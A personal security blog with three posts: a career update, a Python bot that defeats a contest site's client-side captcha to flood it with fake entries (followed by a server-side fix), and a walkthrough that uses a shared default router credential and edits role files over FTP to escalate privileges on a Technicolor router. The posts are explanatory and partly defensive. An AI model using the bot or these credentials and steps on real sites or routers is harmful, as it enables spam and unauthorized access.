Back on track and some words of advice

Hello paranoids

You: What the hell happened to you?

You see, I typically say I am lazy, even though I am not (too much… don’t judge me). I keep doing my stuff, working out and learning as much as I can about security (stopping depresses me, not stopping drains me; decisions, decisions). However, I have two major problems: a lack of time management skills and an everlasting need to try/learn new stuff.

I like to write and teach, which explains why I started this blog. Yet, I like to know what I am talking about before I teach anything, and I am never satisfied with the depth of my knowledge (call it low self-esteem). Since I have had nothing meaningful to write about, this blog has been quite empty. Also, a lot has happened since my last post:

  • I finished my thesis (it was about protecting PaaS services against malicious administrators). I can finally call myself an engineer (bow before me, minions!).
  • I am working for FireEye as an Information Security Analyst (at Dublin’s SOC).

  • I moved from Portugal to Dublin

The first point is cool and all but, unfortunately (for me), not really valued by good IT companies. I may post about it later but, for now, let us focus on the FireEye thing.

If a fellow Portuguese is reading this post, he/she will probably relate when I say that Portugal (at the time of writing) is ruled (in terms of IT employment) by consulting companies, and security-related jobs are pretty bad. So, I would basically be working on boring projects, being exploited by consulting companies and complaining about all of this every single day. I searched a lot and sent my CV to many companies: FireEye, Facebook, Google, Amazon, Palo Alto, Fortinet, RSA, BT. In my country, I spammed every single telecommunications provider, bank and supermarket chain. Truth is: hardly any of these entities hire directly (they typically hire consulting companies which, in turn, hire people).

FireEye got to me first and I was super excited when I got my first email from them. The whole recruiting process was smooth and handled by extremely nice and professional people (expectations met). At that time, I was slightly sad because I wanted to go to the US (cliché, I know). Calisthenics gives me the freedom to work out outside, but I knew Dublin’s weather was bad (confirmed!), which would probably mess up my mood and my willingness to work out. Still, I knew that Portugal was not the way to go for someone passionate about information security. So I did what I never thought I could do: accept the job offer and move to Dublin.

If you live in a country where the economy is plain bad, you are encouraged (pretty early) to leave it and go abroad, to look for companies and people that actually care about you and can provide you with new and meaningful challenges. However, as an IT expat I must warn you:

“Living alone abroad is no easy task.”

This is my first experience abroad (6 months on 15th August), which may explain some misconceptions I have and some mistakes I am making, but, depending on the type of life you had back home and your objectives, leaving your country may be worthwhile or a plain waste of time. If you want to leave your homeland just for the experience, and you want comfort and fun, then do not leave with the objective of saving money; you will be disappointed. If you are on a tight budget and you left your country for money and CV purposes, then be prepared for restrictions: a small house, cooking a lot and, if you get a studio (as I did), be ready for some dish-washing madness. Leaving your home country requires a lot of willpower and sacrifice. Hope for the best but be prepared for the worst.

But, advice and complaints aside:

What am I up to now?

I have been through lots of phases in terms of learning: pentesting, networks, programming, forensics, etc. Without going into further detail, I can tell you my job requires heavy forensics. Finding evil, baby!!!

I like lots of areas and I get bored easily. I used to jump from subject to subject and never got anything done. I have been reading Practical Malware Analysis for a few months and I have to tell you, I am quite happy with what I am learning so far. I have been encouraged by a fellow Portuguese friend to dive into reverse engineering, assembly and malware analysis. I have had experience with assembly in the past. However, I was very afraid that I needed to know lots of low-level stuff. Bear in mind that I am just a grasshopper and I may be simplifying things. However, I find the book quite easy to follow (both theory and labs) and I have managed to stay focused on this subject so far: no more drifting away, and I am not even bored.

With this I conclude my post. I intend to address malware analysis and reverse engineering in future posts. Until then,

Stay safe 😉

Client-side anti-bot mechanism #exerciseinfutility

Hello paranoids

Today, I bring you a laughable case of input validation and anti-bot measures. Let us get straight to the point, shall we?

When checking an online contest, I stumbled across this (the form is from a Portuguese website and was in Portuguese as well):

Contest form

BI is an 8-digit number that uniquely identifies a Portuguese citizen (the national identity card number). I highlighted the “8+9” operation with the mouse. I am pretty sure you can tell what is coming next:

80’s captcha

At first, this seemed like a pretty old-school captcha. It raises two questions:

  1. Is the validation client-side?
  2. Is the value hardcoded on the served page?

Well, a hardcoded question should mean server-side verification (the server knows the answer to the question it served), but you never know. Once I dug into the page’s scripts, I found this:

Client-side verification scripts.

For those wondering which fields are required, they are: name, email, BI, phone and place. As you can see, only the email and the “hipster captcha” are actually checked; the others are checked for emptiness at most. The remaining fields sent are hidden and easily retrievable with a basic script. As for cookies, you get an ASP.NET_SessionId through the Set-Cookie header and other cookies which I assume to be related to statistics (e.g. __gads).

Now, the saddest part here, for both attackers and application owners, is that the form seems to succeed always: with or without cookies, with or without an email address. To make things worse, the end user gets no confirmation email, which means I cannot tell whether my participation was accepted or not (whether my attack succeeded or not). I may be wrong, but I assume that once the form is submitted, any errors from the database are ignored and the end user receives an “accepted” response. The other explanation is that the database fields are all strings and thus there is no type checking (AHH HELL NA!). Still, all this data suffices to create an automated script. In order to make the automated tool look more like a real user, I will retrieve the session cookie first.

This python script should do the trick:

import http.client as httpc
import urllib.parse as urlparse

#Http
host = 'cannot_tell_you_the_host'
path='/destaques/body_passatempos.aspx?id=6910'
# Host must carry the real host name (not the literal string 'host'); Content-Type is the
# standard encoding for an HTML form body, which is what the POST below sends.
headers={'Host':host,'User-Agent':'Mozilla/5.0 (X11; Linux i686; rv:41.0) Gecko/20100101 Firefox/41.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Encoding':'gzip, deflate','Connection':'keep-alive','Content-Type':'application/x-www-form-urlencoded'}

#Form fields - should use DOM but i am lazy
formID='2396'
cookID='DESTAQUEFORM2396'
recipient=urlparse.quote_plus('passatemposcidade@host')
redirect=''
subject=urlparse.quote_plus('Bilhetes O último caçador de bruxas')
participation=0
contest_id=2396
name=urlparse.quote_plus('John doe')
name_sort='nome'
name_required=name_sort
mail=urlparse.quote_plus('jd@yahoo.com')
mail_sort='mail'
mail_required=mail_sort
bi=1234
bi_sort='bi'
bi_required=bi_sort
phone=1234
phone_sort='telefone'
phone_required=phone_sort
place=urlparse.quote_plus('Cinemas NOS COLOMBO (Lisboa)')
place_question=urlparse.quote_plus('Onde queres ver o filme?')
place_sort='r5'
place_required=place_sort

bot_warmup_connection = httpc.HTTPConnection(host,80)

bot_warmup_connection.request("GET",path,'',headers)
first_get_response = bot_warmup_connection.getresponse()
print(first_get_response.getheaders())

participation_body_temp='formID={0}&cookID={1}&recipient={2}&redirect={3}&subject={4}&participation={5}&passatempo_id={6}&nome={7}&sort={8}&required={9}&mail={10}&sort={11}&required={12}&bi={13}&sort={14}&required={15}&telefone={16}&sort={17}&required={18}&r5={19}&p5={20}&sort={21}&required={22}'

participation_body=participation_body_temp.format(formID,cookID,recipient,redirect,subject,participation,contest_id,name,name_sort,name_required,mail,mail_sort,mail_required,bi,bi_sort,bi_required,phone,phone_sort,phone_required,place,place_question,place_sort,place_required)

print(participation_body)
# Reuse the ASP.NET_SessionId the warm-up GET handed out (skip if the server sent none)
set_cookie = first_get_response.getheader('Set-Cookie')
if set_cookie:
	headers['Cookie'] = set_cookie.split(';')[0]

submit_path='/sendMail.asp'

bot_submit_connection = httpc.HTTPConnection(host,80)
bot_submit_connection.request("POST",submit_path,participation_body,headers)
submit_response = bot_submit_connection.getresponse()
response_body = submit_response.read()

# The endpoint answers 200 even for garbage submissions (see below), so this only
# proves the web server accepted the request, not that the contest recorded an entry.
if submit_response.status == 200:
	print("OK!")

This script suffers from some issues and limitations, since the website does not give appropriate feedback on the success of the submission (e.g. a confirmation mail, an HTTP error code, a meaningful server-side response), leaving the bot, and even a non-malicious user, clueless (it is an example of bad security and bad programming… oh well). Add automated generation of BIs and emails and you have enough juice to fill their entire database (or their .txt file, I can’t even tell anymore).

The saddest part is that I had previously notified the website owners of this page (this is not the first time they use such a poor security mechanism) and got no response and no changes. People tend to program following the “it just works!/simplicity over security” paradigm, leaving security aside until they suffer the consequences of their poor decisions. What I have just presented here is not alarming (it is not a data breach of any sort). Yet, it is enough to fill their database with garbage, leaving other legitimate contest participants out.

You think you’re so smart. What would you do?

Well, I am glad you asked. First, the challenge should be generated and verified by the server: what is the point in having the client generate and verify something that is supposed to protect the application from malicious clients? Second, the challenge should be harder to automate than a plaintext sum; an image captcha raises the bar, although a properly made one is only harder, not impossible, to solve (OCR and outsourced solving exist), so it should be paired with rate limiting per IP or session. Third, every field the server relies on (BI, email, phone, place, and the hidden recipient and subject fields, which also arrive from the client) must be validated server-side, since anything the browser sends can be changed. There are plenty of captcha libraries for PHP, ASP, etc. Since I do not know which ones are safer, I will not name any (hacked readers are unsatisfied readers :P).
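As an added example (it is neither the contest site’s code nor any particular captcha library), this is what server-side generation and verification looks like in Python, together with the field rules the form above should have enforced. The field names mirror the form (nome, mail, bi, telefone, r5); the ChallengeStore, the 5-minute lifetime, the 9-digit phone rule and the sample values are assumptions made for illustration.

```python
"""Server-side challenge and field validation for a contest form.

Added example, not the contest site's code. The field names (nome, mail, bi,
telefone, r5) mirror the form in the post; ChallengeStore, the TTL and the
phone rule are assumptions made for illustration.
"""
import re
import secrets
import time

CHALLENGE_TTL = 300  # seconds a challenge stays valid (assumption)


class ChallengeStore:
    """Keeps the expected answers on the server.

    The client only ever receives the question text and an opaque id, so there
    is nothing in the served page a bot can read the answer from."""

    def __init__(self, ttl=CHALLENGE_TTL, clock=time.time):
        self._pending = {}   # challenge id -> (expected answer, expiry timestamp)
        self._ttl = ttl
        self._clock = clock  # injectable so expiry can be tested without sleeping

    def issue(self):
        """Generate a fresh 'a+b' question; return (challenge_id, question)."""
        a, b = secrets.randbelow(90) + 10, secrets.randbelow(90) + 10
        cid = secrets.token_urlsafe(16)
        self._pending[cid] = (str(a + b), self._clock() + self._ttl)
        return cid, f"{a}+{b}"

    def check(self, cid, answer):
        """Single use: the challenge is consumed whether or not the answer is
        right, so one solved (id, answer) pair cannot be replayed by a script."""
        entry = self._pending.pop(cid, None)
        if entry is None:
            return False
        expected, expires_at = entry
        if self._clock() > expires_at:
            return False
        answer = (answer or "").strip()
        if not answer.isascii():          # compare_digest rejects non-ASCII str
            return False
        return secrets.compare_digest(expected, answer)


BI_RE = re.compile(r"\d{8}")        # BI: exactly 8 digits, as described above
PHONE_RE = re.compile(r"\d{9}")     # assumption: 9-digit national number
EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")  # coarse syntax check only
REQUIRED = ("nome", "mail", "bi", "telefone", "r5")
CAPTCHA_ERROR = "captcha: wrong, expired or already used"


def validate_entry(form, store):
    """Return a list of error strings; an empty list means the entry may be stored.

    Every rule runs on the server regardless of what the page's JavaScript did,
    and mail recipient/subject are not taken from the client at all."""
    errors = []
    for field in REQUIRED:
        if not form.get(field, "").strip():
            errors.append(f"{field}: required")
    if form.get("bi") and not BI_RE.fullmatch(form["bi"]):
        errors.append("bi: must be exactly 8 digits")
    if form.get("telefone") and not PHONE_RE.fullmatch(form["telefone"]):
        errors.append("telefone: must be 9 digits")
    if form.get("mail") and not EMAIL_RE.fullmatch(form["mail"]):
        errors.append("mail: malformed address")
    # Always consume the challenge, even when other fields already failed,
    # so a bot cannot probe the field rules without spending a challenge.
    if not store.check(form.get("captcha_id", ""), form.get("captcha", "")):
        errors.append(CAPTCHA_ERROR)
    return errors


if __name__ == "__main__":
    store = ChallengeStore()
    cid, question = store.issue()
    print("Question served to the client:", question)
    a, b = map(int, question.split("+"))
    entry = {"nome": "John Doe", "mail": "jd@example.com", "bi": "12345678",
             "telefone": "912345678", "r5": "Cinemas NOS COLOMBO (Lisboa)",
             "captcha_id": cid, "captcha": str(a + b)}
    print("first submission:", validate_entry(entry, store) or "accepted")
    print("replayed submission:", validate_entry(entry, store))
```

Two design choices matter here. The answer lives only in the server-side store: with a sum of two two-digit numbers there are fewer than 200 possible answers, so a stateless token that carried even a hashed answer could be brute-forced offline by the client before submitting. And each challenge is single-use, so a bot cannot solve one question by hand and reuse the pair for thousands of entries. An image captcha plugs into the same store unchanged; what matters is where the answer is kept and who checks it.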

Stay safe 😉

Technicolor TG784n v3 hidden dangers and privilege escalation (made simple)

If you are reading this post: congratulations! You are reading my first post ever on a blog.

I am pretty sure we share (if you like security) some concerns regarding the internet-connected devices in your house, especially those you cannot fully understand (in my case smartphones and ISP devices). This post concerns the latter since, even though I am not familiar with Technicolor routers, I am still familiar with routers. I wanted to answer the question:

What services does my router offer, especially to the outside world?

First, a little background.

Some of the things I will say here are not rocket science and you most likely know them, but I think it is still important to reiterate them because this blog intends to bring security solutions and concerns to everyone. The internet device you see in your house, which was put there by your Internet Service Provider (ISP), routes your traffic between your internal devices, and between them and the internet. You may have dozens of internet-connected devices in your house, with different (private) IP addresses, but they are all mapped to a single public IP address given by your ISP to identify your network to the world. Such mapping is done using NAT+PAT (Network Address Translation + Port Address Translation). Since you are mapping multiple private addresses to a single public one, you must distinguish packets from different internal devices based on ports. Networking 101 is over! Time to get to the interesting parts.

ISP routers offer multiple services to network users (e.g. DNS, FTP, an HTTP management page, Telnet for router management). While I knew this already, I was curious to find out about other services. These services are typically protected from outside access, i.e., only users with private addresses may reach them, which makes sense. Yet, the services I really wanted to know about were the external ones, exposed on the public address of the router (you can have different services on different router addresses by playing with the firewall).

I started with the internal network. Nmap to the rescue:

nmap -p0- -A -T5 -v default_gateway

where:
-p0-: all ports from 0 to 65535
-A: aggressive scan, which enables OS detection, version detection, script scanning and traceroute
-T5: maximum speed (I am scanning the router in my own house)
-v: verbose output
default_gateway: the router address your devices use to send traffic to networks other than the current one (e.g. the internet)

Nmap reported six open ports (services):

    • 21 (FTP): file storage, typically used by the router’s media center capabilities.
    • 23 (Telnet): router management. If you trust your family you may keep Telnet.
    • 53 (DNS): used by your network devices for name resolution.
    • 80 (HTTP): the user-friendly/limited/buggy administration alternative.
    • 443 (HTTPS): reported as remote management.
    • 1723 (PPTP): VPN server, I suppose.

The only service ringing my paranoid bells is 443 (HTTPS). Yet, it is only seen internally, so I ignored it for the time being. I skipped to the true troublemaker: the external IP. I ran the same Nmap command, but this time against my public address (check yours at whatismyipaddress.com). I also ran Nmap from a public server to rule out firewall restrictions and make the scan more realistic. Nmap reported one open port, 51005, but could not clearly identify what service was there:

CWMP server port open

So I tried to connect to that port using the browser and received this:

HTTP response from 51005

I don’t know about you, but I had to change my pants because this intel made me dirty them. So I searched the port and the router and found out that this service was a server for CWMP, the CPE (Customer-Premises Equipment) WAN Management Protocol, better known as TR-069: the ISP’s Auto Configuration Server (ACS) uses this WAN-facing HTTP listener to ask the router to call home, after which the router itself opens a session to the ACS and fetches its configuration. Being an acronym inside an acronym made me fetch another fresh pair. I am far from being an expert on this remote management protocol, but both words sound suspicious, so I needed to stop that service. However, I could not find the option on the web interface (work smart, not hard). Just out of curiosity, I checked other addresses in my operator’s range and noticed that they were running the same service. The passwords are most likely the same for every router and I will dig deeper into that later.

So, I tried to telnet to my router with the same user/password as the one used on the web interface: Administrator with a blank password. Yes, the password is blank. Routers’ default administrator accounts are widely known to be limited (cough… useless… cough cough). The services running on this router can be listed with: service system list (either directly or by going through each menu: service => system => list). As I expected, the service was not shown to me when using the Administrator account (I could not even access the system menu), which led me to search for the root password, the debug password or a privilege escalation, but Google had no solution. Some people suggested going to the FTP server to get the user.ini config, modify it and put it back, but the Administrator user could not even ls the current directory (WTF?). So, I found out about another user:password pair, upgrade:Th0ms0n!, which apparently has more privileges. I tried it on the Telnet server, but that account was not enabled there; I then tried it on the FTP server and managed to get the user.ini:

I searched the user.ini for Administrator and found this:

Users and roles relations

Sorry to blur the hashes. It is not that I don’t trust you but… I don’t. Through the web administration page source, I managed to find out what hash2 was (MD5, really? says my mom). I could not find the meaning of the other fields, but the role key is interesting. So I changed the Administrator role to root, uploaded the new file and restarted the router. Once more, I FTPed to the router as Administrator but couldn’t even ls, bro! I checked the Administrator entry in user.ini and noticed that the role was once more Administrator… weird… I checked the files in the main FTP directory again and found another interesting file: security.cfg, with the following interesting entries prefixed with r (there were more):

Roles definition

Well, I guess I hit the culprit. I assumed the r’s meant roles, which makes this some sort of hierarchy (genius!) where Administrator is a weak/limited role. I also assumed that what follows the second “;” are the capabilities of the role. SuperUser seems all juiced up since it inherits from root and has lots of any’s, so:

Setting Administrator with the same privileges as SuperUser

I also tried:

rAdministrator;root

in the hope of inheriting all privileges from root (no specification == default == full power), but I assume the capabilities must be listed explicitly. With Administrator carrying SuperUser’s capabilities, I could finally access the router services menu and turn off the CWMP service:

Enabled 51005 service

As you can see, there are two CWMP entries (-C and -S, Client and Server respectively). This is because the operator may connect to the router’s CWMP-S, and the router may contact an operator CWMP server to retrieve configurations. The client side concerns me too, since I am not sure whether the operator may push a different configuration, leaving me once more out of the cool root group, but I will worry about that later.

How do I turn off this service, then?

The Technicolor router has (as expected) an interface similar to other, more widely used routers (the notion of menus and submenus). “?” lists the available commands; when you type a command and press Enter you go to that command’s menu, and to go back just type “..” (shell users will find this familiar). To disable the service, type service, then system and then modify. You will be asked for name, state, port, qoslabel, etc. Just give the name “CWMP-S” and the state “disabled”, and leave the others empty (press Enter until you see a message). The same thing in one line from the root prompt:

:service system modify name=CWMP-S state=disabled

To finish, just type “saveall”, press Enter and wait for the prompt to come back, and you are ready to go! I re-scanned my public IP and the service was no longer available (one less thing to worry about).
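Since the author worries that the operator may push the configuration back, the re-scan is worth automating. The following is an added example, not code from the original post or from Nmap: it parses Nmap’s grepable output (`nmap -oG -`) and flags open ports a home router should not have listening on its WAN side. The two scan texts are constructed to mirror the scans described in this post (not real captures), and the WAN_WATCHLIST is an assumption, apart from 7547 being the IANA-registered CWMP connection-request port.

```python
"""Re-check what a router exposes, from the output of a scan like the ones above.

Added example, not from the original post or from Nmap. Parses Nmap grepable
output (`nmap -oG -`) and reports open ports. Both scan samples below are
constructed to mirror the post's scans; they are not real captures.
"""
import re

# Constructed: what `nmap -p0- -oG - <public ip>` could print with CWMP-S listening.
SAMPLE_WAN_SCAN = """\
# Nmap 6.47 scan initiated as: nmap -p0- -oG - 203.0.113.10
Host: 203.0.113.10 ()\tStatus: Up
Host: 203.0.113.10 ()\tPorts: 51005/open/tcp//unknown///\tIgnored State: filtered (65535)
# Nmap done -- 1 IP address (1 host up) scanned in 600.00 seconds
"""

# Constructed: the LAN-side scan of the default gateway with the six services listed above.
SAMPLE_LAN_SCAN = (
    "Host: 192.168.1.254 ()\tPorts: 21/open/tcp//ftp///, 23/open/tcp//telnet///, "
    "53/open/tcp//domain///, 80/open/tcp//http///, 443/open/tcp//https///, "
    "1723/open/tcp//pptp///, 8080/closed/tcp//http-proxy///\tIgnored State: filtered (65529)\n"
)

# Ports that should never answer on the WAN side of a home router (assumption, except
# 7547, which is the IANA-registered CWMP/TR-069 connection-request port; 51005 is
# where this TG784n v3 was actually listening).
WAN_WATCHLIST = {
    7547: "CWMP (TR-069) connection request, standard port",
    51005: "CWMP-S as observed on the TG784n v3",
    21: "FTP (router file store)",
    23: "Telnet management",
    80: "HTTP management",
    443: "HTTPS remote management",
    1723: "PPTP VPN",
}

# One grepable port entry: port/state/protocol/owner/service/rpc info/version/
PORT_ENTRY = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/[^/]*/[^/]*/")


def parse_grepable(text):
    """Map host -> [(port, protocol, service)] for every port Nmap reports open."""
    open_ports = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, service in PORT_ENTRY.findall(ports_field):
            if state == "open":
                open_ports.setdefault(host, []).append((int(port), proto, service or "unknown"))
    return open_ports


def wan_exposure_report(scan_text, watchlist=WAN_WATCHLIST):
    """One finding per open port. Watchlisted ports get their label; anything else
    is still reported, because an unknown open WAN port deserves a look too."""
    findings = []
    for host, ports in sorted(parse_grepable(scan_text).items()):
        for port, proto, service in sorted(ports):
            label = watchlist.get(port, "unexpected open port")
            findings.append(f"{host}: {port}/{proto} ({service}) - {label}")
    return findings


if __name__ == "__main__":
    print("LAN side (default gateway):")
    for host, ports in parse_grepable(SAMPLE_LAN_SCAN).items():
        print(f"  {host}: {[p for p, _, _ in ports]}")
    print("WAN side (before disabling CWMP-S):")
    for finding in wan_exposure_report(SAMPLE_WAN_SCAN):
        print("  " + finding)
```

In practice you would pipe a real scan into it (`nmap -p0- -oG - <public ip> | python3 wan_check.py`, with the sample replaced by `sys.stdin.read()`) from a host outside your network, as the post does, and schedule it so a configuration pushed by the operator that re-enables CWMP-S shows up as a new finding rather than going unnoticed.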

Final considerations

This post was meant for the more paranoid people. To be honest, I had never messed with this router before, but after escalating privileges I will now customize it to my needs (i.e. mess with the firewall and IDS). I am not implying with this post that you should disable the remote management service for fear that your ISP may connect to it. I am not even sure of the management capabilities of this service. I am more concerned with the possibility of a malicious hacker brute-forcing my router or using a leaked password, which I am pretty sure is the same as on any other router from the same ISP. I did not mention it, but you should always keep a backup of the modified files (I keep .save files on the FTP server). In future posts I may analyze the stored passwords to check whether I can find the default service password. This post is huge, as you may notice, but it is my first and I wanted you to get to know my writing style and myself a little better.

Stay safe 😉